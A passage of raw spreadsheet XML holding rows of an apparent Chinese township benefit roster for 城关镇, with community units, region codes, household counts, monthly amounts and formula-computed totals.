      <c r="H845" s="25">
        <v>325</v>
      </c>
      <c r="I845" s="24">
        <f t="shared" si="13"/>
        <v>650</v>
      </c>
      <c r="J845" s="41">
        <v>45108</v>
      </c>
      <c r="K845" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="846" customHeight="1" spans="1:11">
      <c r="A846" s="23" t="s">
        <v>2280</v>
      </c>
      <c r="B846" s="24" t="str">
        <f>B845</f>
        <v>城关镇</v>
      </c>
      <c r="C846" s="24" t="str">
        <f>C845</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D846" s="23" t="s">
        <v>2281</v>
      </c>
      <c r="E846" s="23" t="s">
        <v>2282</v>
      </c>
      <c r="F846" s="24" t="str">
        <f>F845</f>
        <v>4113210106</v>
      </c>
      <c r="G846" s="24"/>
      <c r="H846" s="24"/>
      <c r="I846" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J846" s="41"/>
      <c r="K846" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="847" customHeight="1" spans="1:11">
      <c r="A847" s="23" t="s">
        <v>2283</v>
      </c>
      <c r="B847" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C847" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D847" s="24" t="s">
        <v>2284</v>
      </c>
      <c r="E847" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F847" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G847" s="24">
        <v>1</v>
      </c>
      <c r="H847" s="25">
        <v>365</v>
      </c>
      <c r="I847" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J847" s="41">
        <v>45108</v>
      </c>
      <c r="K847" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="848" customHeight="1" spans="1:11">
      <c r="A848" s="23" t="s">
        <v>2285</v>
      </c>
      <c r="B848" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C848" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D848" s="24" t="s">
        <v>2286</v>
      </c>
      <c r="E848" s="24" t="s">
        <v>2287</v>
      </c>
      <c r="F848" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G848" s="24">
        <v>1</v>
      </c>
      <c r="H848" s="25">
        <v>365</v>
      </c>
      <c r="I848" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J848" s="41">
        <v>45108</v>
      </c>
      <c r="K848" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="849" customHeight="1" spans="1:11">
      <c r="A849" s="23" t="s">
        <v>2288</v>
      </c>
      <c r="B849" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C849" s="24" t="s">
        <v>2168</v>
      </c>
      <c r="D849" s="24" t="s">
        <v>2289</v>
      </c>
      <c r="E849" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F849" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G849" s="24">
        <v>1</v>
      </c>
      <c r="H849" s="25">
        <v>365</v>
      </c>
      <c r="I849" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J849" s="41">
        <v>45108</v>
      </c>
      <c r="K849" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="850" customHeight="1" spans="1:11">
      <c r="A850" s="23" t="s">
        <v>2290</v>
      </c>
      <c r="B850" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C850" s="24" t="s">
        <v>2291</v>
      </c>
      <c r="D850" s="24" t="s">
        <v>2292</v>
      </c>
      <c r="E850" s="24" t="s">
        <v>669</v>
      </c>
      <c r="F850" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G850" s="24">
        <v>1</v>
      </c>
      <c r="H850" s="25">
        <v>365</v>
      </c>
      <c r="I850" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J850" s="41">
        <v>45108</v>
      </c>
      <c r="K850" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="851" customHeight="1" spans="1:11">
      <c r="A851" s="23" t="s">
        <v>2293</v>
      </c>
      <c r="B851" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C851" s="24" t="s">
        <v>2291</v>
      </c>
      <c r="D851" s="24" t="s">
        <v>2294</v>
      </c>
      <c r="E851" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F851" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G851" s="24">
        <v>1</v>
      </c>
      <c r="H851" s="25">
        <v>365</v>
      </c>
      <c r="I851" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J851" s="41">
        <v>45108</v>
      </c>
      <c r="K851" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="852" customHeight="1" spans="1:11">
      <c r="A852" s="23" t="s">
        <v>2295</v>
      </c>
      <c r="B852" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C852" s="24" t="s">
        <v>2291</v>
      </c>
      <c r="D852" s="24" t="s">
        <v>2296</v>
      </c>
      <c r="E852" s="24" t="s">
        <v>258</v>
      </c>
      <c r="F852" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G852" s="24">
        <v>1</v>
      </c>
      <c r="H852" s="25">
        <v>365</v>
      </c>
      <c r="I852" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J852" s="41">
        <v>45108</v>
      </c>
      <c r="K852" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="853" customHeight="1" spans="1:11">
      <c r="A853" s="23" t="s">
        <v>2297</v>
      </c>
      <c r="B853" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C853" s="24" t="s">
        <v>2168</v>
      </c>
      <c r="D853" s="24" t="s">
        <v>2298</v>
      </c>
      <c r="E853" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F853" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G853" s="24">
        <v>1</v>
      </c>
      <c r="H853" s="25">
        <v>365</v>
      </c>
      <c r="I853" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J853" s="41">
        <v>45108</v>
      </c>
      <c r="K853" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="854" customHeight="1" spans="1:11">
      <c r="A854" s="23" t="s">
        <v>2299</v>
      </c>
      <c r="B854" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C854" s="24" t="s">
        <v>2291</v>
      </c>
      <c r="D854" s="24" t="s">
        <v>2300</v>
      </c>
      <c r="E854" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F854" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G854" s="24">
        <v>1</v>
      </c>
      <c r="H854" s="25">
        <v>365</v>
      </c>
      <c r="I854" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J854" s="41">
        <v>45108</v>
      </c>
      <c r="K854" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="855" customHeight="1" spans="1:11">
      <c r="A855" s="23" t="s">
        <v>2301</v>
      </c>
      <c r="B855" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C855" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D855" s="24" t="s">
        <v>2302</v>
      </c>
      <c r="E855" s="24" t="s">
        <v>611</v>
      </c>
      <c r="F855" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G855" s="24">
        <v>1</v>
      </c>
      <c r="H855" s="25">
        <v>365</v>
      </c>
      <c r="I855" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J855" s="41">
        <v>45108</v>
      </c>
      <c r="K855" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="856" customHeight="1" spans="1:11">
      <c r="A856" s="23" t="s">
        <v>2303</v>
      </c>
      <c r="B856" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C856" s="24" t="s">
        <v>2304</v>
      </c>
      <c r="D856" s="24" t="s">
        <v>2305</v>
      </c>
      <c r="E856" s="24" t="s">
        <v>2306</v>
      </c>
      <c r="F856" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G856" s="24">
        <v>1</v>
      </c>
      <c r="H856" s="25">
        <v>365</v>
      </c>
      <c r="I856" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J856" s="41">
        <v>45108</v>
      </c>
      <c r="K856" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="857" customHeight="1" spans="1:11">
      <c r="A857" s="23" t="s">
        <v>2307</v>
      </c>
      <c r="B857" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C857" s="24" t="s">
        <v>2308</v>
      </c>
      <c r="D857" s="24" t="s">
        <v>2309</v>
      </c>
      <c r="E857" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F857" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G857" s="24">
        <v>2</v>
      </c>
      <c r="H857" s="25">
        <v>325</v>
      </c>
      <c r="I857" s="24">
        <f t="shared" si="13"/>
        <v>650</v>
      </c>
      <c r="J857" s="41">
        <v>45108</v>
      </c>
      <c r="K857" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="858" customHeight="1" spans="1:11">
      <c r="A858" s="23" t="s">
        <v>2310</v>
      </c>
      <c r="B858" s="24" t="str">
        <f>B857</f>
        <v>城关镇</v>
      </c>
      <c r="C858" s="24" t="str">
        <f>C857</f>
        <v>中华社区就业办</v>
      </c>
      <c r="D858" s="23" t="s">
        <v>2311</v>
      </c>
      <c r="E858" s="23" t="s">
        <v>1735</v>
      </c>
      <c r="F858" s="24" t="str">
        <f>F857</f>
        <v>4113210108</v>
      </c>
      <c r="G858" s="24"/>
      <c r="H858" s="24"/>
      <c r="I858" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J858" s="41"/>
      <c r="K858" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="859" customHeight="1" spans="1:11">
      <c r="A859" s="23" t="s">
        <v>2312</v>
      </c>
      <c r="B859" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C859" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D859" s="24" t="s">
        <v>2314</v>
      </c>
      <c r="E859" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F859" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G859" s="24">
        <v>1</v>
      </c>
      <c r="H859" s="25">
        <v>365</v>
      </c>
      <c r="I859" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J859" s="41">
        <v>45108</v>
      </c>
      <c r="K859" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="860" customHeight="1" spans="1:11">
      <c r="A860" s="23" t="s">
        <v>2315</v>
      </c>
      <c r="B860" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C860" s="24" t="s">
        <v>2316</v>
      </c>
      <c r="D860" s="24" t="s">
        <v>2317</v>
      </c>
      <c r="E860" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F860" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G860" s="24">
        <v>1</v>
      </c>
      <c r="H860" s="25">
        <v>365</v>
      </c>
      <c r="I860" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J860" s="41">
        <v>45108</v>
      </c>
      <c r="K860" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="861" customHeight="1" spans="1:11">
      <c r="A861" s="23" t="s">
        <v>2318</v>
      </c>
      <c r="B861" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C861" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D861" s="24" t="s">
        <v>2319</v>
      </c>
      <c r="E861" s="24" t="s">
        <v>2320</v>
      </c>
      <c r="F861" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G861" s="24">
        <v>1</v>
      </c>
      <c r="H861" s="25">
        <v>365</v>
      </c>
      <c r="I861" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J861" s="41">
        <v>45108</v>
      </c>
      <c r="K861" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="862" customHeight="1" spans="1:11">
      <c r="A862" s="23" t="s">
        <v>2321</v>
      </c>
      <c r="B862" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C862" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D862" s="24" t="s">
        <v>2322</v>
      </c>
      <c r="E862" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F862" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G862" s="24">
        <v>1</v>
      </c>
      <c r="H862" s="25">
        <v>365</v>
      </c>
      <c r="I862" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J862" s="41">
        <v>45108</v>
      </c>
      <c r="K862" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="863" customHeight="1" spans="1:11">
      <c r="A863" s="23" t="s">
        <v>2323</v>
      </c>
      <c r="B863" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C863" s="24" t="s">
        <v>2304</v>
      </c>
      <c r="D863" s="24" t="s">
        <v>2324</v>
      </c>
      <c r="E863" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F863" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G863" s="24">
        <v>1</v>
      </c>
      <c r="H863" s="25">
        <v>365</v>
      </c>
      <c r="I863" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J863" s="41">
        <v>45108</v>
      </c>
      <c r="K863" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="864" customHeight="1" spans="1:11">
      <c r="A864" s="23" t="s">
        <v>2325</v>
      </c>
      <c r="B864" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C864" s="24" t="s">
        <v>2326</v>
      </c>
      <c r="D864" s="24" t="s">
        <v>2327</v>
      </c>
      <c r="E864" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F864" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G864" s="24">
        <v>1</v>
      </c>
      <c r="H864" s="25">
        <v>365</v>
      </c>
      <c r="I864" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J864" s="41">
        <v>45108</v>
      </c>
      <c r="K864" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="865" customHeight="1" spans="1:11">
      <c r="A865" s="23" t="s">
        <v>2328</v>
      </c>
      <c r="B865" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C865" s="24" t="s">
        <v>2326</v>
      </c>
      <c r="D865" s="24" t="s">
        <v>2329</v>
      </c>
      <c r="E865" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F865" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G865" s="24">
        <v>2</v>
      </c>
      <c r="H865" s="25">
        <v>365</v>
      </c>
      <c r="I865" s="24">
        <f t="shared" si="13"/>
        <v>730</v>
      </c>
      <c r="J865" s="41">
        <v>45108</v>
      </c>
      <c r="K865" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="866" customHeight="1" spans="1:11">
      <c r="A866" s="23" t="s">
        <v>2330</v>
      </c>
      <c r="B866" s="24" t="str">
        <f>B865</f>
        <v>城关镇</v>
      </c>
      <c r="C866" s="24" t="str">
        <f>C865</f>
        <v>中华社区民政局</v>
      </c>
      <c r="D866" s="31" t="s">
        <v>2331</v>
      </c>
      <c r="E866" s="32" t="s">
        <v>2332</v>
      </c>
      <c r="F866" s="24" t="str">
        <f>F865</f>
        <v>4113210108</v>
      </c>
      <c r="G866" s="24"/>
      <c r="H866" s="24"/>
      <c r="I866" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J866" s="41"/>
      <c r="K866" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="867" customHeight="1" spans="1:11">
      <c r="A867" s="23" t="s">
        <v>2333</v>
      </c>
      <c r="B867" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C867" s="24" t="s">
        <v>2334</v>
      </c>
      <c r="D867" s="24" t="s">
        <v>2335</v>
      </c>
      <c r="E867" s="24" t="s">
        <v>572</v>
      </c>
      <c r="F867" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G867" s="24">
        <v>1</v>
      </c>
      <c r="H867" s="25">
        <v>365</v>
      </c>
      <c r="I867" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J867" s="41">
        <v>45108</v>
      </c>
      <c r="K867" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="868" customHeight="1" spans="1:11">
      <c r="A868" s="23" t="s">
        <v>2336</v>
      </c>
      <c r="B868" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C868" s="24" t="s">
        <v>2337</v>
      </c>
      <c r="D868" s="24" t="s">
        <v>2338</v>
      </c>
      <c r="E868" s="24" t="s">
        <v>677</v>
      </c>
      <c r="F868" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G868" s="24">
        <v>2</v>
      </c>
      <c r="H868" s="25">
        <v>355</v>
      </c>
      <c r="I868" s="24">
        <f t="shared" si="13"/>
        <v>710</v>
      </c>
      <c r="J868" s="41">
        <v>45108</v>
      </c>
      <c r="K868" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="869" customHeight="1" spans="1:11">
      <c r="A869" s="23" t="s">
        <v>2339</v>
      </c>
      <c r="B869" s="24" t="str">
        <f>B868</f>
        <v>城关镇</v>
      </c>
      <c r="C869" s="24" t="str">
        <f>C868</f>
        <v>中华社区粮食局</v>
      </c>
      <c r="D869" s="36" t="s">
        <v>2340</v>
      </c>
      <c r="E869" s="36" t="s">
        <v>1276</v>
      </c>
      <c r="F869" s="24" t="str">
        <f>F868</f>
        <v>4113210108</v>
      </c>
      <c r="G869" s="24"/>
      <c r="H869" s="24"/>
      <c r="I869" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J869" s="41"/>
      <c r="K869" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="870" customHeight="1" spans="1:11">
      <c r="A870" s="23" t="s">
        <v>2341</v>
      </c>
      <c r="B870" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C870" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D870" s="24" t="s">
        <v>2342</v>
      </c>
      <c r="E870" s="24" t="s">
        <v>2343</v>
      </c>
      <c r="F870" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G870" s="24">
        <v>1</v>
      </c>
      <c r="H870" s="25">
        <v>365</v>
      </c>
      <c r="I870" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J870" s="41">
        <v>45108</v>
      </c>
      <c r="K870" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="871" customHeight="1" spans="1:11">
      <c r="A871" s="23" t="s">
        <v>2344</v>
      </c>
      <c r="B871" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C871" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D871" s="24" t="s">
        <v>2346</v>
      </c>
      <c r="E871" s="24" t="s">
        <v>2347</v>
      </c>
      <c r="F871" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G871" s="24">
        <v>1</v>
      </c>
      <c r="H871" s="25">
        <v>365</v>
      </c>
      <c r="I871" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J871" s="41">
        <v>45108</v>
      </c>
      <c r="K871" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="872" customHeight="1" spans="1:11">
      <c r="A872" s="23" t="s">
        <v>2348</v>
      </c>
      <c r="B872" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C872" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D872" s="24" t="s">
        <v>2349</v>
      </c>
      <c r="E872" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F872" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G872" s="24">
        <v>1</v>
      </c>
      <c r="H872" s="25">
        <v>365</v>
      </c>
      <c r="I872" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J872" s="41">
        <v>45108</v>
      </c>
      <c r="K872" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="873" customHeight="1" spans="1:11">
      <c r="A873" s="23" t="s">
        <v>2350</v>
      </c>
      <c r="B873" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C873" s="24" t="s">
        <v>2334</v>
      </c>
      <c r="D873" s="24" t="s">
        <v>2351</v>
      </c>
      <c r="E873" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F873" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G873" s="24">
        <v>1</v>
      </c>
      <c r="H873" s="25">
        <v>365</v>
      </c>
      <c r="I873" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J873" s="41">
        <v>45108</v>
      </c>
      <c r="K873" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="874" customHeight="1" spans="1:11">
      <c r="A874" s="23" t="s">
        <v>2352</v>
      </c>
      <c r="B874" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C874" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D874" s="24" t="s">
        <v>2353</v>
      </c>
      <c r="E874" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F874" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G874" s="24">
        <v>1</v>
      </c>
      <c r="H874" s="25">
        <v>365</v>
      </c>
      <c r="I874" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J874" s="41">
        <v>45108</v>
      </c>
      <c r="K874" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="875" customHeight="1" spans="1:11">
      <c r="A875" s="23" t="s">
        <v>2354</v>
      </c>
      <c r="B875" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C875" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D875" s="24" t="s">
        <v>2355</v>
      </c>
      <c r="E875" s="24" t="s">
        <v>2356</v>
      </c>
      <c r="F875" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G875" s="24">
        <v>1</v>
      </c>
      <c r="H875" s="25">
        <v>365</v>
      </c>
      <c r="I875" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J875" s="41">
        <v>45108</v>
      </c>
      <c r="K875" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="876" customHeight="1" spans="1:11">
      <c r="A876" s="23" t="s">
        <v>2357</v>
      </c>
      <c r="B876" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C876" s="24" t="s">
        <v>2304</v>
      </c>
      <c r="D876" s="24" t="s">
        <v>2358</v>
      </c>
      <c r="E876" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F876" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G876" s="24">
        <v>2</v>
      </c>
      <c r="H876" s="25">
        <v>325</v>
      </c>
      <c r="I876" s="24">
        <f t="shared" si="13"/>
        <v>650</v>
      </c>
      <c r="J876" s="41">
        <v>45108</v>
      </c>
      <c r="K876" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="877" customHeight="1" spans="1:11">
      <c r="A877" s="23" t="s">
        <v>2359</v>
      </c>
      <c r="B877" s="24" t="str">
        <f>B876</f>
        <v>城关镇</v>
      </c>
      <c r="C877" s="24" t="str">
        <f>C876</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D877" s="23" t="s">
        <v>2360</v>
      </c>
      <c r="E877" s="23" t="s">
        <v>303</v>
      </c>
      <c r="F877" s="24" t="str">
        <f>F876</f>
        <v>4113210108</v>
      </c>
      <c r="G877" s="24"/>
      <c r="H877" s="24"/>
      <c r="I877" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J877" s="41"/>
      <c r="K877" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="878" customHeight="1" spans="1:11">
      <c r="A878" s="23" t="s">
        <v>2361</v>
      </c>
      <c r="B878" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C878" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D878" s="24" t="s">
        <v>2363</v>
      </c>
      <c r="E878" s="24" t="s">
        <v>765</v>
      </c>
      <c r="F878" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G878" s="24">
        <v>1</v>
      </c>
      <c r="H878" s="25">
        <v>365</v>
      </c>
      <c r="I878" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J878" s="41">
        <v>45108</v>
      </c>
      <c r="K878" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="879" customHeight="1" spans="1:11">
      <c r="A879" s="23" t="s">
        <v>2364</v>
      </c>
      <c r="B879" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C879" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D879" s="24" t="s">
        <v>2365</v>
      </c>
      <c r="E879" s="24" t="s">
        <v>360</v>
      </c>
      <c r="F879" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G879" s="24">
        <v>1</v>
      </c>
      <c r="H879" s="25">
        <v>365</v>
      </c>
      <c r="I879" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J879" s="41">
        <v>45108</v>
      </c>
      <c r="K879" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="880" customHeight="1" spans="1:11">
      <c r="A880" s="23" t="s">
        <v>2366</v>
      </c>
      <c r="B880" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C880" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D880" s="24" t="s">
        <v>2367</v>
      </c>
      <c r="E880" s="24" t="s">
        <v>697</v>
      </c>
      <c r="F880" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G880" s="24">
        <v>1</v>
      </c>
      <c r="H880" s="25">
        <v>365</v>
      </c>
      <c r="I880" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J880" s="41">
        <v>45108</v>
      </c>
      <c r="K880" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="881" customHeight="1" spans="1:11">
      <c r="A881" s="23" t="s">
        <v>2368</v>
      </c>
      <c r="B881" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C881" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D881" s="24" t="s">
        <v>2369</v>
      </c>
      <c r="E881" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F881" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G881" s="24">
        <v>1</v>
      </c>
      <c r="H881" s="25">
        <v>365</v>
      </c>
      <c r="I881" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J881" s="41">
        <v>45108</v>
      </c>
      <c r="K881" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="882" customHeight="1" spans="1:11">
      <c r="A882" s="23" t="s">
        <v>2370</v>
      </c>
      <c r="B882" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C882" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D882" s="24" t="s">
        <v>2371</v>
      </c>
      <c r="E882" s="24" t="s">
        <v>2372</v>
      </c>
      <c r="F882" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G882" s="24">
        <v>4</v>
      </c>
      <c r="H882" s="25">
        <v>285</v>
      </c>
      <c r="I882" s="24">
        <f t="shared" si="13"/>
        <v>1140</v>
      </c>
      <c r="J882" s="41">
        <v>45108</v>
      </c>
      <c r="K882" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="883" customHeight="1" spans="1:11">
      <c r="A883" s="23" t="s">
        <v>2373</v>
      </c>
      <c r="B883" s="24" t="str">
        <f>B882</f>
        <v>城关镇</v>
      </c>
      <c r="C883" s="24" t="str">
        <f>C882</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D883" s="30" t="s">
        <v>2374</v>
      </c>
      <c r="E883" s="30" t="s">
        <v>2375</v>
      </c>
      <c r="F883" s="24" t="str">
        <f>F882</f>
        <v>4113210108</v>
      </c>
      <c r="G883" s="24"/>
      <c r="H883" s="24"/>
      <c r="I883" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J883" s="41"/>
      <c r="K883" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="884" customHeight="1" spans="1:11">
      <c r="A884" s="23" t="s">
        <v>2376</v>
      </c>
      <c r="B884" s="24" t="str">
        <f>B883</f>
        <v>城关镇</v>
      </c>
      <c r="C884" s="24" t="str">
        <f>C883</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D884" s="30" t="s">
        <v>2377</v>
      </c>
      <c r="E884" s="26" t="s">
        <v>2378</v>
      </c>
      <c r="F884" s="24" t="str">
        <f>F883</f>
        <v>4113210108</v>
      </c>
      <c r="G884" s="24"/>
      <c r="H884" s="24"/>
      <c r="I884" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J884" s="41"/>
      <c r="K884" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="885" customHeight="1" spans="1:11">
      <c r="A885" s="23" t="s">
        <v>2379</v>
      </c>
      <c r="B885" s="24" t="str">
        <f>B884</f>
        <v>城关镇</v>
      </c>
      <c r="C885" s="24" t="str">
        <f>C884</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D885" s="30" t="s">
        <v>2380</v>
      </c>
      <c r="E885" s="26" t="s">
        <v>2381</v>
      </c>
      <c r="F885" s="24" t="str">
        <f>F884</f>
        <v>4113210108</v>
      </c>
      <c r="G885" s="24"/>
      <c r="H885" s="24"/>
      <c r="I885" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J885" s="41"/>
